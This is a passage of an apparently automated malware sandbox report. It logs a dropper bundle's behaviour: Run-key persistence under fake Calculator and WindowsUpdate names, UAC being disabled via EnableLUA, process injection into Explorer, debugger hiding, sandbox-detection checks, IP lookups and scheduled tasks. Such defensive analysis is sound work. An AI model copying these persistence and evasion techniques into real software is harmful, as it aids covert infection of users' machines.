\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe夀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\QUKHyXjH3qRKVkqx = "\"C:\\Users\\Admin\\AppData\\Roaming\\QUKHyXjH3qRKVkqx.exe\"" QUKHyXjH3qRKVkqx.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
9Zb2WtRSw11ACQNzk2XLqI6n.exe4844256.exe8CD8CA21.exe3782043.exeS7koKpK33vLWjAxi5chFkuJ9.exe997740.exe46puvSQnm9v3JLD7WOWMRWFL.exe3176.exeF37OFtk5v9UdORoY8t4Donzo.exejg1_1faf.exeVM2skHGFpeBDBysR6622fBC8.exe6722478.exe1959615.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4844256.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8CD8CA21.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3782043.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 997740.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 46puvSQnm9v3JLD7WOWMRWFL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3176.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6722478.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8CD8CA21.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1959615.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exeinstaller.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Y: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 17 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 138 ipinfo.io 209 ipinfo.io 389 ipinfo.io 2 ip-api.com 47 ipinfo.io 193 ipinfo.io 360 ipinfo.io 395 ipinfo.io 2 ipinfo.io 154 ipinfo.io 202 ipinfo.io 310 ipinfo.io 403 ipinfo.io 49 ipinfo.io 161 ipinfo.io 297 ipinfo.io 378 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
Processes:
6722478.exeF37OFtk5v9UdORoY8t4Donzo.exeS7koKpK33vLWjAxi5chFkuJ9.exe9Zb2WtRSw11ACQNzk2XLqI6n.exe4844256.exe997740.exe1959615.exebeadroll.exeVM2skHGFpeBDBysR6622fBC8.exe3782043.exeRuntimeBroker.exepid process 5924 6722478.exe 5920 F37OFtk5v9UdORoY8t4Donzo.exe 5256 S7koKpK33vLWjAxi5chFkuJ9.exe 5848 9Zb2WtRSw11ACQNzk2XLqI6n.exe 852 4844256.exe 5860 997740.exe 476 1959615.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 5280 beadroll.exe 6040 VM2skHGFpeBDBysR6622fBC8.exe 4264 3782043.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe 17280 RuntimeBroker.exe -
Suspicious use of SetThreadContext 17 IoCs
Processes:
hgmCgKLLp6_aBM_p6OXdxhM4.exedyEvj3hC2t7OMuwoWXdKUmK3.exenxfL7_6XSgUfDUVDEan06Mbe.exe024wC3SO_qVtbE4Y9Lz5RQz9.execontrol.exe46puvSQnm9v3JLD7WOWMRWFL.exeGcleanerEU.exe8CD8CA21.exeE26D.exe3176.exebeadroll.exeBAEC.exeRuntimeBroker.exeRuntimeBroker.exeWindowsUpdate.exeQUKHyXjH3qRKVkqx.exedescription pid process target process PID 4708 set thread context of 1064 4708 hgmCgKLLp6_aBM_p6OXdxhM4.exe Sun03f0dc4460bc9.exe PID 4716 set thread context of 3232 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe Explorer.EXE PID 5248 set thread context of 3232 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe Explorer.EXE PID 5612 set thread context of 5328 5612 024wC3SO_qVtbE4Y9Lz5RQz9.exe 024wC3SO_qVtbE4Y9Lz5RQz9.exe PID 3940 set thread context of 3232 3940 control.exe Explorer.EXE PID 5808 set thread context of 5700 5808 46puvSQnm9v3JLD7WOWMRWFL.exe 46puvSQnm9v3JLD7WOWMRWFL.exe PID 5624 set thread context of 7356 5624 GcleanerEU.exe explorer.exe PID 3940 set thread context of 7356 3940 control.exe explorer.exe PID 1040 set thread context of 3992 1040 8CD8CA21.exe 8CD8CA21.exe PID 8 set thread context of 1440 8 E26D.exe E26D.exe PID 7068 set thread context of 400 7068 3176.exe AppLaunch.exe PID 5280 set thread context of 8160 5280 beadroll.exe regsvcs.exe PID 6664 set thread context of 7748 6664 BAEC.exe BAEC.exe PID 15384 set thread context of 17280 15384 RuntimeBroker.exe RuntimeBroker.exe PID 17280 set thread context of 52096 17280 RuntimeBroker.exe WindowsUpdate.exe PID 52096 set thread context of 52200 52096 WindowsUpdate.exe WindowsUpdate.exe PID 20680 set thread context of 23908 20680 QUKHyXjH3qRKVkqx.exe AddInProcess.exe -
Drops file in Program Files directory 23 IoCs
Processes:
ShareFolder.exeexplorer.execolorcpl.exeZP0MR34BkzoGGsDYhHusS489.exeHamivapasi.exemXtIGk3ofwNa4d7r1RCLpLFz.exeZx0htBgAf3gZhfn9rCPnpedY.execontrol.exeExplorer.EXEdescription ioc process File created C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe.config ShareFolder.exe File created C:\Program Files (x86)\Windows NT\ZHuqoshybila.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\Mrbnhc explorer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat colorcpl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\Internet Explorer\Gaexiwawisi.exe Hamivapasi.exe File created C:\Program Files (x86)\Internet Explorer\Gaexiwawisi.exe.config Hamivapasi.exe File created C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe ZP0MR34BkzoGGsDYhHusS489.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe mXtIGk3ofwNa4d7r1RCLpLFz.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Zx0htBgAf3gZhfn9rCPnpedY.exe File opened for modification C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe control.exe File opened for modification C:\Program Files (x86)\Mrbnhc Explorer.EXE File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat colorcpl.exe File created C:\Program Files (x86)\FarLabUninstaller\is-PS1L5.tmp colorcpl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ZP0MR34BkzoGGsDYhHusS489.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Zx0htBgAf3gZhfn9rCPnpedY.exe File created C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe Explorer.EXE File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe mXtIGk3ofwNa4d7r1RCLpLFz.exe File created C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe Hamivapasi.exe File created C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe.config Hamivapasi.exe File created C:\Program Files (x86)\Windows NT\ZHuqoshybila.exe.config ShareFolder.exe -
Drops file in Windows directory 36 IoCs
Processes:
msiexec.execompattelrunner.exeWerFault.exeQUKHyXjH3qRKVkqx.exeMsiExec.exesvchost.exedescription ioc process File opened for modification C:\Windows\Installer\MSI2900.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\rescache\_merged\3105762040\3638839668.pri compattelrunner.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSIE5D8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4583.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC341.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE3B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI32A5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI372A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF654218DB211F4343.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIB0E1.tmp msiexec.exe File created C:\Windows\Tasks\QUKHyXjH3qRKVkqx.job QUKHyXjH3qRKVkqx.exe File created C:\Windows\Installer\f806443.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI8F3B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4582.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF9A5619A81AAF79E0.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIEDBB.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSIFB55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA621.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1055.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C4D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFD22439F0BB2A7A6B.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFAEC10FD5FACBD244.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\f806443.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6689.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6112 6140 WerFault.exe rundll32.exe 5908 4064 WerFault.exe Sun03d477f1a31.exe 5716 3324 WerFault.exe Sun033e271e0ce96c08.exe 2848 3612 WerFault.exe Sun0324aba28588c0.exe 4008 4600 WerFault.exe Sun03e4aeb7e43a1c.exe 4220 6020 WerFault.exe 4.exe 5624 1560 WerFault.exe VaQQKPf9T577ZPDm1uawzRQO.exe 5448 4872 WerFault.exe FvMCEwri6_qByE_3M8DbslRU.exe 5912 4708 WerFault.exe hgmCgKLLp6_aBM_p6OXdxhM4.exe 2848 5872 WerFault.exe aAXlLwdC9UKnsWc8aTXy3Ptd.exe 4944 5684 WerFault.exe EBU0gvgBJleOPWdQsXtPukc0.exe 5532 5124 WerFault.exe K0TibwmFldhZ549RofY1erc4.exe 4280 8064 WerFault.exe rundll32.exe 7792 8064 WerFault.exe rundll32.exe 2676 1900 WerFault.exe 6.exe 6076 3956 WerFault.exe Soft1WW01.exe 1652 4040 WerFault.exe setup.exe 1788 1900 WerFault.exe 6.exe 7452 7392 WerFault.exe CmeSFYMVAV502OOB00xIE3du.exe 7612 7548 WerFault.exe 2CBMfkvtUogf9hzCi_qA7oap.exe 908 7636 WerFault.exe hhdys4K7UWyFNobqt4GlqiEh.exe 912 6952 WerFault.exe rundll32.exe 2764 6952 WerFault.exe rundll32.exe 1160 5392 WerFault.exe rundll32.exe 4008 7068 WerFault.exe 3176.exe 3428 5392 WerFault.exe rundll32.exe 8088 2584 WerFault.exe 1asWT9_23sWIkWvXBfuAHztv.exe 6908 6228 WerFault.exe 6A4B.exe 6844 7744 WerFault.exe RUc12BIkVlXMFW5crVQpYnzm.exe 7944 4228 WerFault.exe DB08.exe 3988 5280 WerFault.exe beadroll.exe 8008 5280 WerFault.exe beadroll.exe 6324 6084 WerFault.exe 6A96.exe 932 6252 WerFault.exe 7AD5.exe 5464 8176 WerFault.exe powershell.exe 3004 8176 WerFault.exe powershell.exe 5564 3720 WerFault.exe C866.exe 4056 5624 WerFault.exe GcleanerEU.exe 8316 3724 WerFault.exe rundll32.exe 8176 30840 WerFault.exe GcleanerEU.exe 9376 31180 WerFault.exe gcleaner.exe 9432 8252 WerFault.exe rundll32.exe 10436 49716 WerFault.exe GcleanerEU.exe 10580 50108 WerFault.exe gcleaner.exe 11516 7800 WerFault.exe GcleanerEU.exe 31908 11692 WerFault.exe rundll32.exe 32008 31788 WerFault.exe rundll32.exe 32356 8984 WerFault.exe gcleaner.exe 32596 9416 WerFault.exe gcleaner.exe 17224 15296 WerFault.exe fontdrvhost.exe 29440 48612 WerFault.exe GcleanerEU.exe 6812 46192 WerFault.exe rundll32.exe 46836 30588 WerFault.exe gcleaner.exe 8416 6428 WerFault.exe GcleanerEU.exe 8768 7364 WerFault.exe GcleanerEU.exe 28368 9304 WerFault.exe rundll32.exe 8848 5576 WerFault.exe rundll32.exe 8252 5576 WerFault.exe rundll32.exe 11212 49868 WerFault.exe gcleaner.exe 2004 10628 WerFault.exe GcleanerEU.exe 31156 8664 WerFault.exe gcleaner.exe 33660 32976 WerFault.exe rundll32.exe 32532 32448 WerFault.exe gcleaner.exe 41916 40452 WerFault.exe AbcatT5YrtyGV4Gv.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
024wC3SO_qVtbE4Y9Lz5RQz9.exeE26D.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 024wC3SO_qVtbE4Y9Lz5RQz9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E26D.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeGcleanerEU.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier GcleanerEU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6380 schtasks.exe 6568 schtasks.exe 6892 schtasks.exe 6552 schtasks.exe 3596 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 7288 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
